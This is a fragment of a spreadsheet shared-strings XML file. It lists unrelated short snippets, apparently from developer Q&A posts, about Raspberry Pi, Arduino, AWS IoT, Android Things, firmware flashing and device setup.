I have been unsuccessfully scouring the docs and web interface to figure out how I can download my certificate "at any time".</t>
  </si>
  <si>
    <t>Given your use case, an option would be to perform non-blocking read by creating the connection with a time-out of 0 (see http://pyserial.sourceforge.net/pyserial_api.html)
That way, you will have non-blocking .</t>
  </si>
  <si>
    <t>I want to connect my android phone to the WSO2 server on Windows 10, I followed the guide:
Quick Start
After entering the server IP and its port, and the user's credentials, the "Retrieving policy agreement" message appeared and after a while the message changed to: "Enrollment failed, please contact administrator".</t>
  </si>
  <si>
    <t>It has a variety of uses, some of which are: human-computer interaction, security and surveillance, video communication and compression, augmented reality, traffic control, medical imaging1 and video editing.2[3] Video tracking can be a time consuming process due to the amount of data that is contained in video.</t>
  </si>
  <si>
    <t>This will give you the elapsed time since no input was detected.</t>
  </si>
  <si>
    <t>Make RaspberryPi3+ a Wifi access point
If you have no existing network to connect your Pi to:
You can follow instructions from official RaspberryPi3+ website : https://www.raspberrypi.org/documentation/configuration/wireless/access-point.md
Otherwise, if you already have a network you can connect to your pi using its IP.</t>
  </si>
  <si>
    <t>The library you are using provides dedicated methods to perform read and write operations on MIFARE tags:
Since your description (sector 2, block 8) suggests that you are using MIFARE Classic tags, you would also need to authenticate to the tag in order to perform read/write operations.</t>
  </si>
  <si>
    <t>A list of all the contacts stored on your mobile device
Retrieve a list of contacts for which the data matches all or part of a search string, using the following techniques:
Match by contact name
Match any type of contact data
Match a specific type of contact data, such as a phone number
Retrieve the details for a single contact.</t>
  </si>
  <si>
    <t>Not good for structured documentation though...
http://www.chrisdadswell.co.uk/android-coding-example-authenticating-clientlogin-google-reader-api/ - Good resource for coding examples and API documentation
https://code.google.com/archive/p/pyrfeed/wikis/GoogleReaderAPI.wiki - Very good and structured API documentation.</t>
  </si>
  <si>
    <t>After running my code and trying to upload more code to the arduino, I get the following error:
avrdude: verification error, first mismatch at byte 0x0000
         0xff != 0x0c
avrdude: verification error; content mismatch
In the IDE and it refuses to upload the code to the arduino.</t>
  </si>
  <si>
    <t>After that you will be able to see the credential in the following:
The AWS credentials file  located at ~/.aws/credentials on Linux, OS
X, or Unix</t>
  </si>
  <si>
    <t>The value sent from the demo device registered in Hono is successfully received and updated in the Ditto thing.</t>
  </si>
  <si>
    <t>STEP #1
copy + paste it to your terminal step by step:
STEP #2
-
You also need to get an Accesstoken from Dropbox.com
( https://www.dropbox.com/developers/apps )
You need to register an Account.</t>
  </si>
  <si>
    <t>[1] Operation not permitted
BlueCove stack shutdown completed
"
Why the exception is not thrown when using BlueJ I don't understand but from the commandline it appears unable to detect nearby devices because the device is not ready.</t>
  </si>
  <si>
    <t>Bluetooth LE devices like the beacons mentioned above have the concept of connecting to read and write GATT characteristics.</t>
  </si>
  <si>
    <t>Therefore, build a recent firmware and flash it to upgrade your current firmware.</t>
  </si>
  <si>
    <t>Here, I am not able to understand how devices get registered/enrolled on Android Things console and how we can identify a single device.</t>
  </si>
  <si>
    <t>For me, I have 2 possible reasons :
1) Power Supply - I recommended 5V 2A Power Supply
2) Network ethernet patch cable unshielded (without shield or ground line)
This problems with cable I had also on R-Pi2.</t>
  </si>
  <si>
    <t>Just wondering if this is possible:
Emulate Raspbian on VirtualBox
Configure, download plugins
Export Raspbian
Flash it in Rpi
Remote access is also not an option because my router (Huawei, i forgot the model.</t>
  </si>
  <si>
    <t>I searched online and found some advice to first install mono-vbnc and mono-complete :
Unfortunately it also gives some errors:
openhabian@openHAB2:~$ sudo apt-get install mono-vbnc mono-complete
  [sudo] password for openhabian: Reading package lists Done Building
  dependency tree Reading state information Done Some packages could
  not be installed.</t>
  </si>
  <si>
    <t>mosquitto_sub --cafile rootCA.pem --cert cert.pem --key privateKey.pem -h a3380wclf1r5nk.iot.ap-southeast-2.amazonaws.com -p 8883 -q 1 -d -t lights/things/things01 -i thing01
Error: Unable to load client key file "privateKey.pem".</t>
  </si>
  <si>
    <t>The data that is being written to the log.txt file when the cron job runs looks fine to me, heres a sample:
root - 00:16 - gpio write 7 0
root - 00:17 - gpio write 7 0
root - 00:18 - gpio write 7 0
root - 00:19 - gpio write 7 0
I have tried giving the php file that is to be executed both 755 and 777 permissions with no luck.</t>
  </si>
  <si>
    <t>Finally, looking access() doc:
The access() function checks the file named by the pathname pointed to by the path argument for accessibility according to the bit pattern contained in amode, using the real user ID in place of the effective user ID and the real group ID in place of the effective group ID.</t>
  </si>
  <si>
    <t>As far as I understand, the old way of using the realtime database with a secret is deprecated (as it states, on the database secrets page in your project settings), and there is the Firebase Admin SDK with OAuth 2.0 in the place of it.</t>
  </si>
  <si>
    <t>Please follow this step in the documentation to register a device model.</t>
  </si>
  <si>
    <t>I have downloaded the CA Certificate, but I do not see where I can pass this in when setting up the AWSIoTMqttClient():
Could someone please point me in the right direction?</t>
  </si>
  <si>
    <t>group
dialout (and permisses and all about this option, is done)
lsusb
reboot 
start from root 
unplug and plug, and plugging in different ports
I would appreciate every solution which doesn't implies "unistall and install the Arduino" "have another version" or even "another ubuntu", cause it worked fine, and it can verify code and all of that.</t>
  </si>
  <si>
    <t>I'm currently working on a raspberry pi project that would require the wifi dongle (Realtek RTL8188CUS) to obtain the MAC addresses of nearby devices that have not connected to it.</t>
  </si>
  <si>
    <t>(Once you are connected via ethernet you then can configure the wifi and finally remove the ethernet cable).</t>
  </si>
  <si>
    <t>So the code was updated as follows:
var awsIot = require('aws-iot-device-sdk');
    var device = awsIot.device({
        keyPath: '/home/pi/deviceSDK/certs/private.pem.key',
        certPath: '/home/pi/deviceSDK/certs/certificate.pem.crt',
        caPath: '/home/pi/deviceSDK/certs/caCert.crt',
        clientId: 'Raspberry',
        region: 'us-west-2',
        host:   'https://XXXXXXXXXX.iot.us-west-2.amazonaws.com'
    });
    device.on('connect', function() {
           console.log('connected');
    });
In which XXXXXXXXXXX is obviously provided by AWS as Rest API Endpoint to interact with "thing" in my account as following picture shows.</t>
  </si>
  <si>
    <t>When i receive a DELETE request i read the file, delete the entry and write it again with the other information that it may contain (if more than one LED was connected), if the server loses power or gets shut down and restarts it reads the file and restores the LEDs statuses.</t>
  </si>
  <si>
    <t>Ethernet connection worked when I used a fixed IP in the tablet and did everything in correct order:
First, disable Wifi and mobile data
Connect Ethernet and set fixed IP in Settings
Open video stream
Enable Wifi and/or mobile data
Use another browser tab/app to connect to the Internet (the Ethernet connection stayed alive in my tests)
If necessary, use a port forwarding app to share the video stream to other devices over Wifi
However, I ended up using USB Tethering instead of Ethernet.</t>
  </si>
  <si>
    <t>I followed following tutorials to get so far:
https://blog.dantup.com/2016/03/installing-lighttpd-php7-and-letsencrypt-on-raspberry-pi-raspbian-jessie-lite/
https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-magento-on-ubuntu-14-04</t>
  </si>
  <si>
    <t>If there is a power failure or reset during a write, the page sequence number will not be valid as it is written last and both the sequence and inverse sequence write must complete, so the partially written data will be invalidated and the previous valid page will be selected on start-up.</t>
  </si>
  <si>
    <t>This will not only detect common flaw at compile-time, but also saves RAM and (possibly even) Flash as non-const variables are stored in RAM with initialization values in Flash.</t>
  </si>
  <si>
    <t>I have found out that:
The SDK sets certain options by default
The SDK transfers options through the application/protocol stack
The SDK can set certain TLS options, for example those pertaining to X509 certificates
I was not able to find any way to set options like the accepted ciphers or the aforementioned TLS compression.</t>
  </si>
  <si>
    <t>Im currently writing a script that checks USB Sticks for malicious files that runs on a Raspberry Pi.</t>
  </si>
  <si>
    <t>Several issues:
First -
Per the data sheet, page 18:
To enable programming of the RDAC register, the write protect bit (Bit
  C1), of the control register must first be programmed by loading the
  serial data input register with Command 7
per the data sheet page 20 table 14, shows that by default C1 is 0, 
0 = wiper position frozen to value in 50-TP memory (default)
  , or midscale if not previously programed.</t>
  </si>
  <si>
    <t>Here are my details:
I am using the following example from the official Arduino website - http://arduino.cc/en/Tutorial/WiFiWebServer
I have just updated my firmware following this tutorial - http://www.dfrobot.com/community/how-to-upgrade-arduino-wifi-shield-firmware-on-windows.html
My network has WPA2 security.</t>
  </si>
  <si>
    <t>avrdude: AVR device initialized and ready to accept instructions
Reading | ################################################## | 100% 0.01s
avrdude: Device signature = 0x1e9801 (probably m2560)
avrdude: Expected signature for ATmega328P is 1E 95 0F
         Double check chip, or use -F to override this check.</t>
  </si>
  <si>
    <t>It has various functions including
flashing images to different partitions
erasing the data on different partitions, and
completely reflashing your device from an  file
It is a powerful tool that used incorrectly can damage your Android device or completely wipe all of the data from it.</t>
  </si>
  <si>
    <t>It was was verified for pi:
http://elinux.org/RPi_VerifiedPeripherals#Fingerprint_Scanners
I followed the steps to install the scanner with the API library ScanAPI_Ex.</t>
  </si>
  <si>
    <t>I'm trying to setup a remote kernel on my Raspberry Pi right now, using IPython as my remote kernel and try to connect to this kernel using Spyder.</t>
  </si>
  <si>
    <t>The URL must have user specific credentials, these credentials will not change so am trying to write to, then read from a file and insert to the correct part of the URL.</t>
  </si>
  <si>
    <t>Moreover you can also edit the firmware to suit your chip ID..but before doing that please read its data sheet properly and if possible then try to cross check it several time before updating your firmware.</t>
  </si>
  <si>
    <t>This recipe introduces to steps on how you can register the Raspberry Pi as a Registered Device and monitor / administer the same using Watson IoT Platform Dashboard.</t>
  </si>
  <si>
    <t>The Real Time Reporting API enables you to request real time data for an authenticated user</t>
  </si>
  <si>
    <t>The Real Time Reporting API enables you to request real time data for an authenticated user.</t>
  </si>
  <si>
    <t>It implements most of the functionalities of the API (Authentication, Database management and Storage)
Read more about Pyrebase here
Read more about Firebase API here</t>
  </si>
  <si>
    <t>|  3   Kevin    80000 |
   +---------------------+
If your data is confidential, you can demonstrate the problem using the sysuse command to load one of Stata's toy datasets:
sysuse dir
auto.dta         bplong.dta       brand2.dta       bsexper3.dta     census.dta     
auto2.dta        bpwide.dta       bsexper1.dta     cancer.dta       citytemp.dta    
autornd.dta      brand1.dta       bsexper2.dta     cearep.dta       citytemp4.dta
sysuse census, clear
list state region pop marriage in 1 / 5
   +---------------------------------------------+
   | state        region          pop   marriage |
   |---------------------------------------------|
1.</t>
  </si>
  <si>
    <t>I can detect all keys in a little python script using pynput -- except that the decimal point key isnt detected when numlock is on (it works with numlock off) and that the key labelled 5 isnt detected at all (numlock on or off).</t>
  </si>
  <si>
    <t>1) Login through facebook/google 
2) If devices are in more than one region show the option to choose those region 
3)List devices in the region
4) Get status of device
5) Publish message to Device 
I am aware of AWs IOT, just need pointer in how should i go ahead in developing AWS IOT based mobile app.</t>
  </si>
  <si>
    <t>DFU is intended to download and upload firmware to devices connected over USB.</t>
  </si>
  <si>
    <t>After starting it i am retrieving the following error:
This looks like a permission thing, but I executed
just like they mentioned in the tutorial.</t>
  </si>
  <si>
    <t>Unregistered users may watch videos, and registered users may upload an unlimited number of videos.</t>
  </si>
  <si>
    <t>I have add some new lines to the avrdude.conf in /etc -directory
but now i get a another error
avrdude: safemode: Verify error - unable to read lfuse properly.</t>
  </si>
  <si>
    <t>The kivy app loads on a button press and gives the user options for authentication (e.g rfid, keypad etc) On selecting an option it takes the user to another screen telling them to input their pin in the case of the keypad option.</t>
  </si>
  <si>
    <t>So, you need to manually RESET the module every time you attempt to upload the firmware.</t>
  </si>
  <si>
    <t>EDIT The bounty can be collected by either providing a working example of video decode using vchiq, an API walkthrough that shows the calling sequence (even though not a working example) or a pointer to sufficient documentation to write this.</t>
  </si>
  <si>
    <t>If data is only appended to the data structure while writing out to disk, that won't actually cause a problem with the way I'm writing the data, but there are some circumstances where earlier data can be modified as new data is being recorded and that would really mess with the integrity of what I'm in the middle of writing to disk.</t>
  </si>
  <si>
    <t>The
  following table breaks down API support in Android Things:
Supported APIs:
Awareness
Cast
Google Analytics for Firebase
Firebase Cloud Messaging (FCM)
Firebase Crash Reporting
Firebase Realtime Database
Firebase Remote Config
Firebase Storage
Fit
Instance ID
Location
Maps
Nearby
Places
Mobile Vision
SafetyNet</t>
  </si>
  <si>
    <t>I connected the raspberry to the Internet using an Android phone with USB-tethering (the raspberry pi zero doesn't have an ethernet port, I tried with a Zydas WiFi dongle but I couldn't make it work) so running ifconfig outputs:
I'm trying to access the raspberry from a linux computer (running debian 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt25-2 (2016-04-08) x86_64 GNU/Linux), I use the command:
But that results in an error:
ssh: connect to host 192.168.42.172 port 22: Connection timed out
I have enabled SSH on the raspberry using the command:
raspi-config
Running the ssh command on the raspberry works but it times out when I use it in the linux computer.</t>
  </si>
  <si>
    <t>I have tried: 
Enabling internet sharing on the Ethernet connection and enabling the SSH services (port 22 both TCP and UDP)
Disabling wifi on Win
Forgetting wifi on raspberry
Manually activating SSH server on raspberry even though I'm pretty sure it was activated already.</t>
  </si>
  <si>
    <t>Also tried to use ESPlorer but it was unable to auto-detect the firmware.</t>
  </si>
  <si>
    <t>What I basically want to do is to suspend and resume the monitoring of the pin state at any point in time by the click of a button.</t>
  </si>
  <si>
    <t>Firmware upgrade on all devices
A reasonable pattern would be to use the Device Shadow in AWS IoT to store in the reported state, the current firmware information of your device.</t>
  </si>
  <si>
    <t>The first time the device try to connect it will fail but will run this script in lambda, once it finish successfully the next time the device try to connect it should work because the certificate is registered and active.</t>
  </si>
  <si>
    <t>Everythings works fine, but at starting I get this message:
Does anybody has experience with the iBeacon detection on Android-things devices (Raspberry Pi 3)?</t>
  </si>
  <si>
    <t>The issue I am running into, is that AVRDude appears to program the chip, however when it tries to verify what was written, it fails on byte 0x0002 everytime.</t>
  </si>
  <si>
    <t>AVRDude appears to recognize the chip signature, and appears to correctly read the default values from the fuse bits.</t>
  </si>
  <si>
    <t>In Android devices it could be done easily using by integrating Google Sign in Option but since my Android Thing device doesn't have any interface, Google Sign In could not be implemented in it.</t>
  </si>
  <si>
    <t>Manually, we can do that by opening a WinSCP and login to raspberry pi, give the permission to copy files, download that file from raspberry pi, copy it into the windows folder.</t>
  </si>
  <si>
    <t>As the commenters have suggested, the first thing to check is that you have the correct system time -- or at least an incorrect time that falls within the range your certificate professes ;-)</t>
  </si>
  <si>
    <t>The binaries become corrupt due to heating, to restore it to its normal state, use any flasher tool to re-flash the firmware onto it.</t>
  </si>
  <si>
    <t>Confirmation can be implied by a normal read or write on the new file descriptor, and rejection can be implied by closing the new socket.</t>
  </si>
  <si>
    <t>A read-write lock is a synchronization tool for protecting resources that can be accessed for reading and writing.</t>
  </si>
  <si>
    <t>If I set up beacons through out the building, I can make the arduino device advertise itself to these beacons.....then I would somehow need the beacons to communicate the arduino device location back to the android phone.</t>
  </si>
  <si>
    <t>Most used reference points (beacons) are:
wi-fi access points (wi-fi ADSL routers/modems) 
GSM/3G cell phone antennas (BTS or Node-b) 
Bluetooth dongles
These systems are mainly used to guide the user through the map of the building to a specific room or even to a specific shelf ("indoor navigation").</t>
  </si>
  <si>
    <t>Following is the publisher code: 
The subscriber code is:
The Ethernet shield is working well as it successfully executed the example programs.</t>
  </si>
  <si>
    <t>ls gives follow result:
I guess that I need to grant read permissions for a file, how ever Set-Acl doesn't have such an option.</t>
  </si>
  <si>
    <t>Note: user must have the correct permissions
Source(s): 
Step 1
Steps 2 &amp; 3
Step 4 
Step 5</t>
  </si>
  <si>
    <t>I have the following code: (record.sh)
When I run this script manually the output is the following:
If the same script is run via a (root) cronjob, the output is the following:
19/01/2016 19:07:01
start
As you can see, the file "action.txt" has been read without a problem ("start" is logged both times) so this should not be an issue of permissions or wrong paths.</t>
  </si>
  <si>
    <t>Im using a C program to read/write GPIO pins, but there is the problem: Im using ioperm to give permissions to do write / read operations on ports, but I really need to run this program without root privileges (the error is Segmentation fault )
Is there any way to do this?</t>
  </si>
  <si>
    <t>If you give those devices a read/write permission to the registry (which the shared access key is stored in the app), there will be a risk that a malicious user finds out the shared access key and use it to abuse the system.</t>
  </si>
  <si>
    <t>I found the solution since there are functions event.waitKeys() which is basically waiting for a key for an infinite amount of time, that is why time.time() &lt; Mytimer condition is not able to verify.</t>
  </si>
  <si>
    <t>Luckily, Raspberry Pi has can detect any I2C device connected and show you their address using the following command: 
or
Note: The first command works for all the latest Raspberry Pi3 and Pi2 (models A, B, B +) and Pi Zero.</t>
  </si>
  <si>
    <t>Following steps here (specifically, all of step one and step two by setting 'Protection' to 'On' for my C: drive) allows the code above to run without errors.</t>
  </si>
  <si>
    <t>I believe I have all the credential etc in place - I have to copy the token.jsn file that was generated from my credentials onto the pi every time I deploy, but nonetheless it all seems to be connecting as it should.</t>
  </si>
  <si>
    <t>If your modules just can't seem to find each other it usually comes down to a mismatch in the PAN settings (ID), security settings (LK), or network joining permission settings on the coordinator (NJ).</t>
  </si>
  <si>
    <t>But when I want to access camera with c++ OpenCV from Raspberry Pi, it is giving me an error about GStreamer pipeline;
code:
const string videoAddress = "rtsp://user:password@xxx.xxx.x.xxx:xxx/cam/realmonitor?channel=1&amp;subtype=1";
int main() {
  cv::VideoCapture video;
  cv::Mat im;
  cv::namedWindow("IP", 1);
  video.open(videoAddress);
  if (video.isOpened()) {
    video &gt;&gt; im;
    if (!im.data) break;
    cv::imshow("IP", im);
    if (cv::waitKey(20) &gt;= 0) break;
  }
}
I can access camera with same rtsp address, omxplayer is showing normal gst-launch is showing frames rotated by 180 degrees.</t>
  </si>
  <si>
    <t>So I have a raspberry pi and another device which I am using ethernet over USB to connect to via ssh and I can not find a way to find the link-local IP address
for example if I have bonjour and putty, then  will connect me to the pi I have hooked up.</t>
  </si>
  <si>
    <t>You are correct that the iBeacon Development Kit is not designed to detect iBeacons -- it is designed to transmit as an iBeacon.</t>
  </si>
  <si>
    <t>The response was :
The following is the code I use:
And I also verified there have valid credential setting and policies verified for my AWS account.</t>
  </si>
  <si>
    <t>This is the output from the test command on the Raspberry Pi:
I'm trying to figure out why the lock's ready state is set to false only on the raspberry pi.</t>
  </si>
  <si>
    <t>Provided that lock bits are not programmed, it is possible to read the contents of both flash and EEPROM by adding  options to the invocation of avrdude.</t>
  </si>
  <si>
    <t>Naive solution: Store database credentials on your server (or somewhere on internet) so every time Raspberry Pi run the script, it connect to the server to get the credentials first.</t>
  </si>
  <si>
    <t>Or at least teach me how to debug what causes the lockup (using which tool, as the lockup happens at a random point and there are too many procedures, using gdb to run the program step-by-step isn't an option)
Thanks in advance.</t>
  </si>
  <si>
    <t>Also you have to manual load the wifi kernel module:
# modprobe brcmfmac
After that, you can confirm wlan0 with 
# ifconfig -a
You could also configure Buildroot to build udev as /dev management option, in this case, WiFi kernel module will be loaded automatically.</t>
  </si>
  <si>
    <t>The only thing that unlocks MyTest.exe is rebooting the machine...kind of a pain if you only get 1 debug run before rebooting the machine each time!</t>
  </si>
  <si>
    <t>The code that I have written works with no problems but 1 in every 200 read/write, it returns an occasional wrong reading which would be a huge set back on the system's reliability.</t>
  </si>
  <si>
    <t>Running "uname -a" on my Raspberry Pi will yield the following:
Linux tm-gw 4.4.14-v7+ #896 SMP Sat Jul 2 15:09:43 BST 2016 armv7l GNU/Linux
My problem is that I have a USB device which vendor and product ID isn't registered in CP210x.c file, which - again - means that even though it can be found, the raspberry will not allow communication with it (/dev/ttyUSB0 doesn't exist).</t>
  </si>
  <si>
    <t>Is there a way that I can associate my network credentials with a Raspberry Pi B+ running the latest edition of Raspbian Jessie connected by Ethernet in order to make this error go away?</t>
  </si>
  <si>
    <t>I've tried to write a very little script in order to connect to my raspberrypi as follows:
but it returns just immediately prints the prompt for my password three times -- I can't write anything and I don't know why.</t>
  </si>
  <si>
    <t>Unfortunately I cannot use the Android Calendar API because Android Things as no Google account linked to it, like a normal Android device, nor a user interface that can be used to select the account and grant the the permission.</t>
  </si>
  <si>
    <t>Then I restarted mosquitto and I'm just getting this error over and over again:
I've verified multiple times that the certificates that I'm using are the correct ones, I've also checked that the Thing has a policy attached to it and that the certificates are activated.</t>
  </si>
  <si>
    <t>https://aws.amazon.com/blogs/iot/setting-up-just-in-time-provisioning-with-aws-iot-core/
If I use the default policy provided in this link, I am able to successfully register the thing.</t>
  </si>
  <si>
    <t>Given that RPi has Ethernet, that would be a far simpler method of board to board communication and is not limited to point-to-point, but can access an entire network, and there will be no USB driver issues to tackle.</t>
  </si>
  <si>
    <t>I also had to play with my router settings to get the buttons to detect my network in the first place (but if you can do the whole setup process fine then that's probably not the case).</t>
  </si>
  <si>
    <t>Time-based One-Time Password algorithm (TOTP) is an algorithm that computes a one-time password from a shared secret key and the current time.</t>
  </si>
  <si>
    <t>Rockbox can be permanently flashed into flash memory on the Archos devices, making it a firmware replacement.</t>
  </si>
  <si>
    <t>I've already tried following these instructions, which use the remote-atom package in atom: https://atom.io/packages/remote-atom, and when I enter 
into the terminal using ssh after following all the proper instructions, it doesn't open the file from my raspberry pi onto atom as expected.</t>
  </si>
  <si>
    <t>Use the following procedures to configure certificate enrollment policy settings:
Manage Certificate Enrollment Policy by Using Group Policy 
Manage Certificate Enrollment Policy by Using the Certificates Snap-in 
Reference.</t>
  </si>
  <si>
    <t>Regarding the things you already tried:
-installed an Android app in the /system/app folder with world executable perms
-installed an Android app in the /system/private-app folder with world executable perms
Apps installed in Android's  partition are allowed privileged access to various Android-level permissions, but this does not affect their Linux UIDs.</t>
  </si>
  <si>
    <t>So the installation goes successfully and I boot into raspbian GUI successfully and make changes to raspi-config like to ask for the password when booting into GUI and enable various option like SSH,SCI and more.</t>
  </si>
  <si>
    <t>RedBear Labs has a couple of decent firmware examples for the CC2540 including ones that do scanning:
https://redbearlab.zendesk.com/entries/72966016-BLE-Mini-Tutorials
See here for how to flash custom firmware on the CC2540 using BLUNO:
http://www.dfrobot.com/wiki/index.php/Bluno_SKU:DFR0267#Update_BLE_Firmware_on_Bluno.EF.BC.88AT.2BVERSION_to_check_the_version.EF.BC.89</t>
  </si>
  <si>
    <t>Make sure to connect ethernet and leave it connected when it is booting
- If ethernet is not connected during boot up, the RPi will not configure ethernet.</t>
  </si>
  <si>
    <t>After some research i found out that the raspberry pi 3 alone cannot act as a USB device, and so it cannot be detected as a keyboard by the TV.</t>
  </si>
  <si>
    <t>I have followed all the instructions here (https://learn.adafruit.com/downloads/pdf/dht-humidity-sensing-on-raspberry-pi-with-gdocs-logging.pdf)
and here (http://gspread.readthedocs.org/en/latest/oauth2.html#), but I get an error message each time, specifically 
"Unable to login and get spreadsheet.</t>
  </si>
  <si>
    <t>If i include a p12 file in the project ide, and connect to aws iot, every thing works fine
but if i download the certificate from the server and save into a local file
I get the following error: CFNetwork SSLHandshake failed (-9829)
I've checked in a for loop that both certificates are indentical
any tip?</t>
  </si>
  <si>
    <t>I reset the wifi shields firmware, following this tutorial.</t>
  </si>
  <si>
    <t>Once I get the credentials I am using nodejs to update the wifi credentials using fs.write().</t>
  </si>
  <si>
    <t>Essentially the await times out because authentication is not complete.</t>
  </si>
  <si>
    <t>But still can't decide how to detect only my own ESP8266 (no any other esp8266) via Android app for the same smartConfig method.</t>
  </si>
  <si>
    <t>Download ESPFlasher from here and flash the firmware onto the chip.</t>
  </si>
  <si>
    <t>Just flash the firmware onto the chip and download ESPlorer IDE.</t>
  </si>
  <si>
    <t>downloading and uploading the certificate manually, etc.</t>
  </si>
  <si>
    <t>But when I reached to seventh step.As mentioned  I tried to get bulk token but It was not asking for sing to connecting to Azure AD.I moved forward and completed all the steps but device is not listed in enrollment device list.I assume that because it had not been asking for sing in due to this reason  device is not appear in the list.</t>
  </si>
  <si>
    <t>The AWS IoT Java SDK provides functions to generate certificates, and to register/activate them on AWS, but I can't figure out how to sign them with my root CA certificate and activate them.</t>
  </si>
  <si>
    <t>Enable SSH like: 
documentation
Or start it manually  - note that  manual option will require startup scrip to run at each startup.</t>
  </si>
  <si>
    <t>You can follow the following tutorial to verify you have the right TPM version enabled and fTPM is functioning:
Setup firmware TPM (fTPM)</t>
  </si>
  <si>
    <t>If you're using MQTT, the simplest way to connect your device to the Watson IoT Platform is as follows:
When you register your device, you define (or get given) an authentication token - in effect, a password for that device.</t>
  </si>
  <si>
    <t>What is new:
Email Verification
Guest User Gates / Policies
Symfony Dump Server
Notification Localization
Console Testing
URL Generator &amp; Callable Syntax
Paginator Links
Filesystem Read / Write Streams
Resources:
Release notes about 5.7
Upgrade guide for 5.7
Framework API</t>
  </si>
  <si>
    <t>It seems to be getting mixed up BEFORE the -ice_name parameter
This is the command 
Not sure if it you need the file beng sourced, but just in case here it is
#!/bin/bash
#
# stream.cfg
#
# WiFi Settings
#
wifi_name=mywifi
wifi_password=mywifipwd
#
# Icecast Server Settings
#
icecast_server=icecast.server.com
icecast_port=443
icecast_mount_url=/user/mountpt/url
icecast_show="RPi Demo Show - autostart"
icecast_description="Test of Stream from RPi USB Audio to Spreaker"
icecast_user=""
# Source password
icecast_password=sourcepwd
#
# avconv setting for Raspbian Jessie Lite
# may not need if you're using a self compiled ffmpeg version
#
icecast_legacy=1
#
# Stream Settings - probably not safer to go higher unless great internet connection
#
stream_bitrate=128k
Script that processes config file and generates stream command
#!/bin/bash
#
# autostart-settings.sh
#
# Load in config file settings
CONFIG_FILE=~/autostart/autostart-settings.cfg
# Check if file exists
echo "does file exist"
if [ !</t>
  </si>
  <si>
    <t>Setup Wi-Fi settings
Connect to RPi3 via adb using the IP displayed:
Setup Wi-fi settings as per the docs:
adb shell am startservice -n com.google.wifisetup/.WifiSetupService -a WifiSetupService.Connect -e ssid network_SSID -e passphrase network_passcode
Connect to RPi3 over Wi-Fi (2 in picture)
    adb connect Android.local
Notes:
network_SSID and network_passcode are case sensitive,
remove -e passphrase network_passcode if your network doesn't have one
What if I have neither display nor Ethernet cable?</t>
  </si>
  <si>
    <t>cd /home/pi/Downloads/
run the google auth tool with the path to your downloaded json file (including its long name, replace idxxx with your id)
google-oauthlib-tool --client-secrets /home/pi/Downloads/client_secret_client-idxxx.json --scope https://www.googleapis.com/auth/assistant-sdk-prototype --save --headless
there will be a link generated  in the console.</t>
  </si>
  <si>
    <t>I have completed the first two steps i.e
prepare the environment    
Create a device enrollment entry
While doing the simulate the device step.</t>
  </si>
  <si>
    <t>Data collected is processed and then we move to point 1,2
Whole region is complete and user gets message that scanning is complete.</t>
  </si>
  <si>
    <t>But I can send Cloud-To-Device message successfully using your in-complete code and the corrective SAS-token format(Previously mentioned).</t>
  </si>
  <si>
    <t>Instead, Android Things falls back on the install-time permissions model for all permissions requested in the manifest.</t>
  </si>
  <si>
    <t>s= (session name)
i=* (session information)
u=* (URI of description)
e=* (email address)
p=* (phone number)
c=* (connection information - not required if included in all media)
b=* (bandwidth information)
One or more time descriptions (see below)
z=* (time zone adjustments)
k=* (encryption key)
a=* (zero or more session attribute lines)
Zero or more media descriptions (see below)
Time description
t= (time the session is active)
r=* (zero or more repeat times)
Media description
m= (media name and transport address)
i=* (media title)
c=* (connection information - optional if included at session-level)
b=* (bandwidth information)
k=* (encryption key)
a=* (zero or more media attribute lines)</t>
  </si>
  <si>
    <t>Here are the things I have tried so far:
Changing the COM port
Disabling all the other devices CONNECTED to COM
Tightening the CONNECTIONS
Re installing all the drivers and the IDE
Rebooting the system
Using another laptop to upload code
All the above have given me the same output for some reason.</t>
  </si>
  <si>
    <t>I created an iam user in my aws and downloaded the access key and secret key
Logged into AWS IOT with that user and created a "thing"
From the thing's property I found the REST URL for the shadow
Used Postman with the new "aws signature" feature and provided it with the access key, secret key, region (us-east-1) and service name (iot) 
Tried to "GET" the endpoint and this is what I got -
I thought there is something wrong with postman so I tried using aws-sdk-sample example of connecting to S3 and changed it to connect to the IOT URL.</t>
  </si>
  <si>
    <t>all things i did but my PC is not detected Android device
any kind of suggestion will be appreciated
Thanks in advance</t>
  </si>
  <si>
    <t>When connecting to it (with the correct password) I get each time the following message: "Error connecting to access point &gt; Timeout waiting to be connected to the selected access point".</t>
  </si>
  <si>
    <t>To strip permissions: How to restrict a linux user to be only able to read /home/user and nothing else
To give permission to that one file: https://askubuntu.com/questions/487527/give-specific-user-permission-to-write-to-a-folder-using-w-notation</t>
  </si>
  <si>
    <t>For example, an adapter card that controls a boot device might contain firmware that is used to connect the device to the system once the Option ROM is loaded.</t>
  </si>
  <si>
    <t>I can get the code to activate or deactivate once I upload a fresh copy of the code, but once I activate it after upload and try to deactivate the security system, it only takes in 2 numbers and then prompts me to Wrong password.</t>
  </si>
  <si>
    <t>Unless I disable Windows Defender 'Real-time protection', I get a 'Flashing Unsuccessful' error message while trying to setup a new Raspberry Pi device using Windows IoT Core Dashboard.</t>
  </si>
  <si>
    <t>Upon startup, the iphone app registers with Apple, gets the device token for Push notifications, registers with AWS, gets the end-point ARN and finally sends this to the IoT device so that it can do its magic with the AWS connection it has.</t>
  </si>
  <si>
    <t>I am not aware of any custom firmware that is designed to send beacon scan results from the BLUNO, but in theory it should be possible if you are willing to dig down deep and write your own firmware.</t>
  </si>
  <si>
    <t>The instructions are right there in the comments of the code you posted:
To detect proprietary beacons, you must add a line like below corresponding to your beacon type.</t>
  </si>
  <si>
    <t>The problem with using BlueZ for beacon detection is that it is simply not stable on the Raspberry Pi, and will freeze up and stop detecting requiring a reboot.</t>
  </si>
  <si>
    <t>The thing shadow system does not perform any rules, it is just for
  performing event sourcing and keeping last known state in virtual
  thing actors.</t>
  </si>
  <si>
    <t>Clearing that bit results in disabling write protection: The kernel may write read-only mapped pages.</t>
  </si>
  <si>
    <t>The steps given in the official Github Readme file are correct but you need to consider some options below in case you encounter errors:
Don't use the default value of keystore credentials as written in the readme file.</t>
  </si>
  <si>
    <t>You can use the parameters of Start-Process to specify options, such as loading a user profile, starting the process in a new window, or using alternate credentials.</t>
  </si>
  <si>
    <t>Their flagship products include:
the Multi compiler/debugger suite
the Integrity real-time OS
the -velOSity real-time microkernel
hardware debugging probes</t>
  </si>
  <si>
    <t>Streaming detection
To continuously detect anomalies on streaming data, use the following request URI with your latest data point:
/timeseries/last/detect.</t>
  </si>
  <si>
